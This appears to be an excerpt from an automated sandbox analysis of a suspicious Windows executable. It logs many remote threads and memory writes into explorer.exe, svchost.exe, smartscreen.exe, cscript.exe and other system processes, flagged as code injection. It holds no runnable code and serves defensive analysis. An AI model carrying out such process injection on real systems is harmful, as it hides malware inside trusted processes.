        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2AD0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2B20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2D40000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2D90000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2C40000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2C90000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2A80000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2BD0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 1480000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 3230000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: E70000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: E80000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 890000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 21C0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2E00000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2E50000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2540000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2690000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2CE0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2CF0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2BF0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2C40000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 28C0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2910000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 21E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2230000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: ED0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: F20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2AB0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2B00000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: B20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: B30000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2110000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2160000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2AD0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2C20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 810000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 820000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2A60000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2A70000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 1200000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 1210000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: F50000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: F60000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 23B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2400000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: B80000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: B90000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 7D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 7E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2EC0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2F10000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 1150000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 1160000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: D50000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: D60000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 25E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2640000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2D40000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2D50000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2B10000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2C60000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 11E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 11F0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 11D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 11E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 670000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 680000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 810000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 820000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 14A0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 14B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: E60000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: E70000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 8B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 8C0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 860000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 870000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 24A0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 24F0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 9B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: A00000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: AF0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: B00000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: B00000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: B10000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: D20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: D30000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 1260000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 1270000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: FB0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: FC0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: E50000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: E60000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 12A0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 12B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2080000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2090000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2F00000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2F50000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2A20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2A30000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2570000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2580000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 12D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 1320000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 28A0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 28B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 1160000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 1170000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 9D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 9E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: AB0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: AC0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2210000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2220000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: F80000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: F90000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2700000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 2750000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 10B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 10C0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: FA0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: FB0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: F20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: F70000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: D40000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: D50000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 1350000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 13A0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 7B0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeThread created: unknown EIP: 7C0000Jump to behavior
        Injects code into the Windows Explorer (explorer.exe)
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: PID: 3504 base: 7480000 value: E8Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: PID: 3504 base: 82C0000 value: E8Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: PID: 3504 base: AE40000 value: E8Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: PID: 3504 base: B170000 value: E8Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: PID: 3504 base: B230000 value: E8Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: PID: 3504 base: B780000 value: E8Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: PID: 3504 base: B790000 value: E8Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: PID: 3504 base: B7A0000 value: E8Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: PID: 3504 base: B7B0000 value: E8Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: PID: 3504 base: DD50000 value: E8Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: PID: 3504 base: DD60000 value: E8Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: PID: 3504 base: DD70000 value: E8Jump to behavior
        Writes to foreign memory regions
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: F10000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\fontdrvhost.exe base: 190000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\dwm.exe base: 660000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\sihost.exe base: D20000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 3F0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 8D0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\ctfmon.exe base: 7F0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\explorer.exe base: 7480000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\svchost.exe base: 2E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: A30000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 620000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 160000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: A80000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 980000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\smartscreen.exe base: 890000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: F70000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1A0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 9A0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: AA0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SysWOW64\cscript.exe base: 4980000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\SysWOW64\cscript.exe base: 49E0000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\conhost.exe base: 590000Jump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory written: C:\Windows\System32\conhost.exe base: 570000Jump to behavior
